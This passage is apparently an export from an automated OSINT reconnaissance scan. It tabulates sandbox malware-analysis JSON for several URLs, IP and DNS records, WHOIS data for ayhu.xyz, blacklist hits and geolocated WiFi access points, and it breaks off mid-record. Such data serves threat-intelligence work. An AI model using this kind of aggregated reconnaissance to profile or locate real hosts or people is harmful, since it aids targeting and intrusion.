| 2023-05-12 02:58:51 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_4b8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_4b8_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_4b8_IESQMMUTEX_0_519"\n "IsoScope_4b8_ConnHashTable<1208>_HashTable_Mutex"\n "IsoScope_4b8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1208"\n "IsoScope_4b8_IE_EarlyTabStart_0xcdc_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_16DA73C7-3990-11ED-AD5E-080027028D54_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001208]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001208]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002448]\n 
"~DF3EF417CE002B5E1E.TMP" has type "data"- Location: [%TEMP%\\~DF3EF417CE002B5E1E.TMP]- [targetUID: 00000000-00001208]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001208]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00002448]\n "~DF2B8D68DAE78C0FF5.TMP" has type "data"- Location: [%TEMP%\\~DF2B8D68DAE78C0FF5.TMP]- [targetUID: 00000000-00001208]\n "~DFA907A56EE39E2179.TMP" has type "data"- Location: [%TEMP%\\~DFA907A56EE39E2179.TMP]- [targetUID: 00000000-00001208]\n "1XFY5LX8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1XFY5LX8.txt]- [targetUID: 00000000-00001208]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001208]\n "RecoveryStore._16DA73C5-3990-11ED-AD5E-080027028D54_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue"\n Pattern match: 
"https://docs.semeris.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: https://www.wildbeard.app/ (AV positives: 1/88 scanned on 09/21/2022 11:28:28)\n URL: https://zoommeetingbackgrounds.com/ (AV positives: 1/88 scanned on 09/21/2022 11:06:42)\n URL: https://rad-malabi-562f5e.netlify.app/?naps (AV positives: 1/89 scanned on 09/21/2022 10:39:51)\n URL: https://ts3.app/ (AV positives: 1/88 scanned on 09/21/2022 10:05:55)\n URL: https://gleeful-tapioca-4e76b0.netlify.app/ (AV positives: 2/88 scanned on 09/21/2022 09:27:54)\n File SHA256: e6b8324a67ce0c8fcce1f50ff15981bfa2197cd7b32f97cf0734ecd53d415352 (AV positives: 4/75 scanned on 09/15/2022 10:50:57)\n File SHA256: 1026177be3921f58bc03d5818a94a864520f14f76d183f25aa7c4d336cb1e5c9 (AV positives: 3/74 scanned on 09/13/2022 23:26:25)\n File SHA256: 0c9d72af2ea2e3934f99c4659037afa2b80f730b0df269b091ab073eb1b3392c (AV positives: 24/75 scanned on 09/12/2022 23:24:30)\n File SHA256: 0616ae44e3accaf9af529e16093b1b1f6d7954aa93056766bfd2eb4926560ee2 (AV positives: 24/75 scanned on 09/12/2022 18:53:06)\n File SHA256: 659266e6d4ff1538972b6f39af1dab6ca217fadafe0dfd96a403d10c5b97a521 (AV positives: 9/75 scanned on 09/11/2022 22:57:22)\n File SHA256: faa32adb3d32d68cd8bc667b146e874a96cb4469d8e5dbbe4122216b9771bd2e (Date: 11/17/2019 03:18:46)'}], u'threat_level': 0, u'size': None, u'job_id': u'632af55f008c332beb442bb4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'8542bd5b44a22c5a1605485c1ad44055090c9b024aee2513be530a18da580c4a', 
u'sha512': u'9ae3d19c8ebe44cd7b07416ccf2b632216a73ad72d62e0a59452f4da2231ab6132942ab6ef56a328060f6962cbfdca6869224c57c2dce533812597b39ac4579b', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue', u'submission_id': u'632af560008c332beb442bb5', u'created_at': u'2022-09-21T11:28:32+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-21T11:28:32+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 6, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'75ddf83f80276bc7273fb058a3a32b7b', u'network_mode': u'default', u'processes': [], u'sha1': u'e5d4489c92656003234158f7fa1d115343dd3dfc', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 03:41:52 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Microsoft Windows | 45.131.109.53 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 172.67.168.252 | battleb0t.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.108.0/24 |
| 2023-05-12 02:46:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:5528:304:WilStaging_02"\n "Local\\SM0:5528:120:WilError_01"\n "SM0:5528:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:3984:304:WilStaging_02"\n "SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3984:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.191.74:443"\n "142.251.214.131:443"\n "172.217.12.104:443"\n "34.248.78.39:443"\n "192.30.255.117:443"\n "142.251.46.174:443"\n "104.254.151.69:443"\n "142.250.141.157:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.k8slens.dev"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003984]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 25036 version 1.0"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003984]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "Session_13324055852125015" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "data_2" has type "dBase III DBT version number 0 next free 
block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006748]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003984]\n "Last Browser" has type "data"- [targetUID: N/A]\n "6d3ef7fa-ecc8-4cf2-87b4-e82371405c12.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- [targetUID: N/A]\n "627c3a7f-c957-4f31-952c-cbc35428ddc2.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "data_1" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006748]\n "f4af993c-e56b-444e-bf40-1281122cb7b5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "data_0" has type "FoxPro FPT blocks size 512 next free block index 3284796609 field type 0 dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006748]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00003984]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://k8slens.dev/"\n Pattern match: "https://k8slens.dev"\n Pattern match: 
"https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: "https://fonts.googleapis.com,supports_spdy:true},{anonymization:[],server:https://edge.microsoft.com,supports_spdy:true},{alternative_service:[{advertised_alpns:[h3],expiration:13326647883143133,port:443,protocol_str:quic}],anon"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.251.214.131"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.243.25"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'641c62f03e70d209d706b9d4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, 
u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent' | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:10:83) | 37.7813933,-122.3918002 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.137 | 34.148.97.127 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AWildAndAnUntamedThing (Net ID: A0:8E:78:0F:4D:DE) | 37.751, -97.822 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/fredo.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.103): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:50 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 83.170.74.34.bc.googleusercontent.com | 34.74.170.83 |
| 2023-05-12 02:59:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74', u'96.6.31.32'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.mailhardener.com/kb/email-address-types-explained', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "184.31.135.120:80"\n "96.6.31.32:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001948)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as 
clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFDEF.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00001948) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, 